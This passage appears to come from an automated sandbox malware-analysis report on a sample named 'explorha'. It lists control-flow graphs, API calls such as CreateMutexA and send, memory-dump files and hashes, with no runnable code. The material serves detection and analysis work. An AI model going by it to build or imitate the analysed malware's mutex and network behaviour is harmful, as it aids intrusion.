                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 01250dac7a7625693d4a4fde4938c52b76ba4e66f40406b5344f5c05b1695b31
                                                                                                      • Instruction ID: 4e72ecf6257cad8f982491df52bc96715fd5f3d22976f13ed3db17bf32d720a1
                                                                                                      • Opcode Fuzzy Hash: 01250dac7a7625693d4a4fde4938c52b76ba4e66f40406b5344f5c05b1695b31
                                                                                                      • Instruction Fuzzy Hash: 24315A716102048BEB0CDF7CDDC8B6DBB6AFB85324F208218E464EB3D5D77599808B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 31 869a14-869a34 35 869a36-869a42 31->35 36 869a62-869a7e 31->36 37 869a44-869a52 35->37 38 869a58-869a5f call 87ecf8 35->38 39 869a80-869a8c 36->39 40 869aac-869acb 36->40 37->38 43 86a3fb 37->43 38->36 45 869aa2-869aa9 call 87ecf8 39->45 46 869a8e-869a9c 39->46 41 869acd-869ad9 40->41 42 869af9-86a3e6 call 879750 40->42 48 869aef-869af6 call 87ecf8 41->48 49 869adb-869ae9 41->49 51 86a423-86a466 Sleep CreateMutexA 43->51 52 86a3fb call 8982fa 43->52 45->40 46->43 46->45 48->42 49->43 49->48 52->51
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 1e9b2aa9e9851ba7d70d70ed285d16bfec8d40576af65c6c3dd6b44285cd067d
                                                                                                      • Instruction ID: 79283dbac25f0ceebbf3495df5dbb0c933d6e6e6e56c23280f093ca33dca92f5
                                                                                                      • Opcode Fuzzy Hash: 1e9b2aa9e9851ba7d70d70ed285d16bfec8d40576af65c6c3dd6b44285cd067d
                                                                                                      • Instruction Fuzzy Hash: F03166716141048BEB08DBBCDD88BACB7A6FB85324F248208E454EB3C5D77699808B51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 62 869b49-869b69 66 869b97-869bb3 62->66 67 869b6b-869b77 62->67 70 869bb5-869bc1 66->70 71 869be1-869c00 66->71 68 869b8d-869b94 call 87ecf8 67->68 69 869b79-869b87 67->69 68->66 69->68 76 86a400 69->76 72 869bd7-869bde call 87ecf8 70->72 73 869bc3-869bd1 70->73 74 869c02-869c0e 71->74 75 869c2e-86a3e6 call 879750 71->75 72->71 73->72 73->76 79 869c24-869c2b call 87ecf8 74->79 80 869c10-869c1e 74->80 82 86a423-86a466 Sleep CreateMutexA 76->82 83 86a400 call 8982fa 76->83 79->75 80->76 80->79 83->82
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 2258da0fe5b5f08cb9223663b5aceee99ca1b6444423057325eb8f3c950a8e7e
                                                                                                      • Instruction ID: eb2faa7f4f0b2c78f6f48b2d0bb371240fd2464c53f92eda62d9df8b8c44c9e4
                                                                                                      • Opcode Fuzzy Hash: 2258da0fe5b5f08cb9223663b5aceee99ca1b6444423057325eb8f3c950a8e7e
                                                                                                      • Instruction Fuzzy Hash: 563148716002089BEB0CDB7CDDC9BACB766FBC5324F248218E464EB3D5C775A9808B55
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 93 869c7e-869c9e 97 869ca0-869cac 93->97 98 869ccc-869ce8 93->98 99 869cc2-869cc9 call 87ecf8 97->99 100 869cae-869cbc 97->100 101 869d16-869d35 98->101 102 869cea-869cf6 98->102 99->98 100->99 103 86a405 100->103 107 869d37-869d43 101->107 108 869d63-86a3e6 call 879750 101->108 105 869d0c-869d13 call 87ecf8 102->105 106 869cf8-869d06 102->106 110 86a423-86a466 Sleep CreateMutexA 103->110 111 86a405 call 8982fa 103->111 105->101 106->103 106->105 114 869d45-869d53 107->114 115 869d59-869d60 call 87ecf8 107->115 111->110 114->103 114->115 115->108
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 04a89d31599896e9ed1fdd58d160185f9625e8dd4326f085a2a97bb630994080
                                                                                                      • Instruction ID: 90b5e8201e9c464fdf50484fc7c98bcd93b1d9d60c09b3ceea3c554728c83481
                                                                                                      • Opcode Fuzzy Hash: 04a89d31599896e9ed1fdd58d160185f9625e8dd4326f085a2a97bb630994080
                                                                                                      • Instruction Fuzzy Hash: 873144726002048BEF08DB78DD88BACBB66FB85324F208618E464EB3D5D77599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 124 869ee8-869f08 128 869f36-869f52 124->128 129 869f0a-869f16 124->129 132 869f54-869f60 128->132 133 869f80-869f9f 128->133 130 869f2c-869f33 call 87ecf8 129->130 131 869f18-869f26 129->131 130->128 131->130 134 86a40f 131->134 136 869f76-869f7d call 87ecf8 132->136 137 869f62-869f70 132->137 138 869fa1-869fad 133->138 139 869fcd-86a3e6 call 879750 133->139 141 86a414-86a466 call 8982fa * 3 Sleep CreateMutexA 134->141 142 86a40f call 8982fa 134->142 136->133 137->134 137->136 145 869fc3-869fca call 87ecf8 138->145 146 869faf-869fbd 138->146 142->141 145->139 146->134 146->145
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: e04d90d3d0f20fc54edbe8aaf6402687b04439eef5fc979e624227a4603c8ac9
                                                                                                      • Instruction ID: 552baa533084d60db44aea98c71db90812fe84f85645fcbc93e8f6d63b4f1b05
                                                                                                      • Opcode Fuzzy Hash: e04d90d3d0f20fc54edbe8aaf6402687b04439eef5fc979e624227a4603c8ac9
                                                                                                      • Instruction Fuzzy Hash: 2B3157716002048BEF08EB7CCD89B9DB676FF86314F248218F055EB3D9DB7599808B56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 161 86a01d-86a03d 165 86a03f-86a04b 161->165 166 86a06b-86a087 161->166 167 86a061-86a068 call 87ecf8 165->167 168 86a04d-86a05b 165->168 169 86a0b5-86a0d4 166->169 170 86a089-86a095 166->170 167->166 168->167 173 86a414-86a466 call 8982fa * 3 Sleep CreateMutexA 168->173 171 86a0d6-86a0e2 169->171 172 86a102-86a3e6 call 879750 169->172 175 86a097-86a0a5 170->175 176 86a0ab-86a0b2 call 87ecf8 170->176 177 86a0e4-86a0f2 171->177 178 86a0f8-86a0ff call 87ecf8 171->178 175->173 175->176 176->169 177->173 177->178 178->172
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: db4176f3204a77be2559d31bc828a002fd0e730a6eb38d9742347635c41142c4
                                                                                                      • Instruction ID: 01c6d9869ea5550198e2146e00c28425eaf6e3b9474a08a86a1f784434fa0b7d
                                                                                                      • Opcode Fuzzy Hash: db4176f3204a77be2559d31bc828a002fd0e730a6eb38d9742347635c41142c4
                                                                                                      • Instruction Fuzzy Hash: 30310971600504DBEB0CDB7CCD89B6DB676FB86318F248258E415EB3D6CB7599808B63
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 196 86a152-86a172 200 86a174-86a180 196->200 201 86a1a0-86a1bc 196->201 202 86a196-86a19d call 87ecf8 200->202 203 86a182-86a190 200->203 204 86a1be-86a1ca 201->204 205 86a1ea-86a209 201->205 202->201 203->202 208 86a419-86a466 call 8982fa * 2 Sleep CreateMutexA 203->208 210 86a1e0-86a1e7 call 87ecf8 204->210 211 86a1cc-86a1da 204->211 206 86a237-86a3e6 call 879750 205->206 207 86a20b-86a217 205->207 213 86a22d-86a234 call 87ecf8 207->213 214 86a219-86a227 207->214 210->205 211->208 211->210 213->206 214->208 214->213
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 8f70be8890443f49367fe77e1891d993366fa382edec50ac23f33d564c161d0d
                                                                                                      • Instruction ID: 68946bc699608aa654eaa5a0dd8f72fd10c08b266bfe7685d98cd4f062ded32a
                                                                                                      • Opcode Fuzzy Hash: 8f70be8890443f49367fe77e1891d993366fa382edec50ac23f33d564c161d0d
                                                                                                      • Instruction Fuzzy Hash: C43128716001049BEF0CDB7CDD89B6DB776FB86314F248218E425EB3D6C77699808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 229 86958c-8695aa 230 8695ac-8695b8 229->230 231 8695d8-8695f7 229->231 232 8695ce-8695d5 call 87ecf8 230->232 233 8695ba-8695c8 230->233 234 869625-86a3e6 call 879750 231->234 235 8695f9-869605 231->235 232->231 233->232 236 86a3e7 233->236 238 869607-869615 235->238 239 86961b-869622 call 87ecf8 235->239 244 86a423-86a466 Sleep CreateMutexA 236->244 245 86a3e7 call 8982fa 236->245 238->236 238->239 239->234 245->244
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 952b1fcdf55653180af387fe0ba5e204b3f531f3a043e1a6333f4cf42aa37e60
                                                                                                      • Instruction ID: 43827bb565a5eb0b29a0892e20266fb0bfe68a91751048b5eecb38c874bd9a47
                                                                                                      • Opcode Fuzzy Hash: 952b1fcdf55653180af387fe0ba5e204b3f531f3a043e1a6333f4cf42aa37e60
                                                                                                      • Instruction Fuzzy Hash: FC2168316042089BFB08DF6CDD897ACBB76FB85314F20820DE459EB3C5C7759A808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 271 86a326-86a33e 272 86a340-86a34c 271->272 273 86a36c-86a36e 271->273 274 86a362-86a369 call 87ecf8 272->274 275 86a34e-86a35c 272->275 276 86a370-86a377 273->276 277 86a379-86a381 call 8678b0 273->277 274->273 275->274 278 86a41e-86a458 call 8982fa Sleep CreateMutexA 275->278 280 86a3bb-86a3e6 call 879750 276->280 288 86a3b4-86a3b6 277->288 289 86a383-86a38b call 8678b0 277->289 292 86a45e-86a466 278->292 288->280 289->288 293 86a38d-86a395 call 8678b0 289->293 293->288 297 86a397-86a39f call 8678b0 293->297 297->288 300 86a3a1-86a3a9 call 8678b0 297->300 300->288 303 86a3ab-86a3b2 300->303 303->280
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a23582f2f80350953b448829066b11e2e799452dcb6197a3d30aaf92f0ade2f1
                                                                                                      • Instruction ID: 5d29c5223efbc329d7aec1008673967b840aa52c83b7fe90abd52a50a076924b
                                                                                                      • Opcode Fuzzy Hash: a23582f2f80350953b448829066b11e2e799452dcb6197a3d30aaf92f0ade2f1
                                                                                                      • Instruction Fuzzy Hash: 51213D3134420997FB2CAB6CDE8FB6C7663FB41704F254415E504EA7C2CA799D80CAAB
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 251 869e1f-869e2b 252 869e41-869e6a call 87ecf8 251->252 253 869e2d-869e3b 251->253 259 869e6c-869e78 252->259 260 869e98-86a3e6 call 879750 252->260 253->252 255 86a40a 253->255 257 86a423-86a466 Sleep CreateMutexA 255->257 258 86a40a call 8982fa 255->258 258->257 261 869e8e-869e95 call 87ecf8 259->261 262 869e7a-869e88 259->262 261->260 262->255 262->261
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 7ec6452b6fe7a2fe8aa5f7764c9e61173a2ae021cb5f4e0cdec71ed68136b6bf
                                                                                                      • Instruction ID: e0862f7b94bf262a337686cc56c320f44fe1f4cac1899720eb75a24c9f4282e8
                                                                                                      • Opcode Fuzzy Hash: 7ec6452b6fe7a2fe8aa5f7764c9e61173a2ae021cb5f4e0cdec71ed68136b6bf
                                                                                                      • Instruction Fuzzy Hash: BE2157727042049BFB1CDB6CDD897ACB766FB85321F24821CE419EB3D5CBB696808752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _wcsrchr
                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                      • Opcode ID: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction ID: b05c6622cec164a70c840783034b95d437fbec275dcb87a659f4224268f2b486
                                                                                                      • Opcode Fuzzy Hash: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction Fuzzy Hash: 2201A577A04726692E143018AC026776798FBC3BB071D003EFC54F72C2EE94DC0141A9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1418687624-0
                                                                                                      • Opcode ID: 900e0ff68e5bd5b7b1d830803db81a26411b684bf22629a0661be177683c9c0b
                                                                                                      • Instruction ID: 1cf2141e0495e21068f2d56a1dc026ee645a5e6b208ff28d57e194510385e35c
                                                                                                      • Opcode Fuzzy Hash: 900e0ff68e5bd5b7b1d830803db81a26411b684bf22629a0661be177683c9c0b
                                                                                                      • Instruction Fuzzy Hash: 5F81E472E003159BD7259B28CC45FAAB7B8FF09314F164679E919E7291EB31EC00CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                      • Instruction ID: d5b07ae4540bffbf3c9dc836fe3e5f6872c2b172b861e843d638aaa14b598de3
                                                                                                      • Opcode Fuzzy Hash: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                      • Instruction Fuzzy Hash: 8CB12232A046959FDF11EF68C881BAEBFA5FF56300F2C816AE841DB342D6349D01CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1418687624-0
                                                                                                      • Opcode ID: de1a6e0a6c631cf3b8415fc4fd25764b4573f4c740a8be86f873fd866bed6720
                                                                                                      • Instruction ID: e9e38e6c009c3ee0ad944ab065100041e068efc5a6999c8281cb90c9d39b2413
                                                                                                      • Opcode Fuzzy Hash: de1a6e0a6c631cf3b8415fc4fd25764b4573f4c740a8be86f873fd866bed6720
                                                                                                      • Instruction Fuzzy Hash: 81A1F270900B069FDB21DB68C944B6ABBF8FF15310F018579E819DB281EB34EA04CBD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • send.WS2_32(?,?,00000004,00000000), ref: 0086D43E
                                                                                                      • send.WS2_32(?,?,00000008,00000000), ref: 0086D47A
                                                                                                      • send.WS2_32(?,?,?,00000000), ref: 0086D4BC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: send
                                                                                                      • String ID:
                                                                                                      • API String ID: 2809346765-0
                                                                                                      • Opcode ID: f3ca2d4bb112be24005be533feb38b59720ca78dea12c727d9b689e6ab62fcd1
                                                                                                      • Instruction ID: 40b276115e062521aa533d0c0ad9d3ded942d7fc71f643c03820cde1ecf44393
                                                                                                      • Opcode Fuzzy Hash: f3ca2d4bb112be24005be533feb38b59720ca78dea12c727d9b689e6ab62fcd1
                                                                                                      • Instruction Fuzzy Hash: 8441D672F002149BDB288B7CCC85BADB7B5FF45324F1142A9E829E73D1DA30AD408B85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • invalid stoi argument, xrefs: 0086DD04
                                                                                                      • stoi argument out of range, xrefs: 0086DCFA
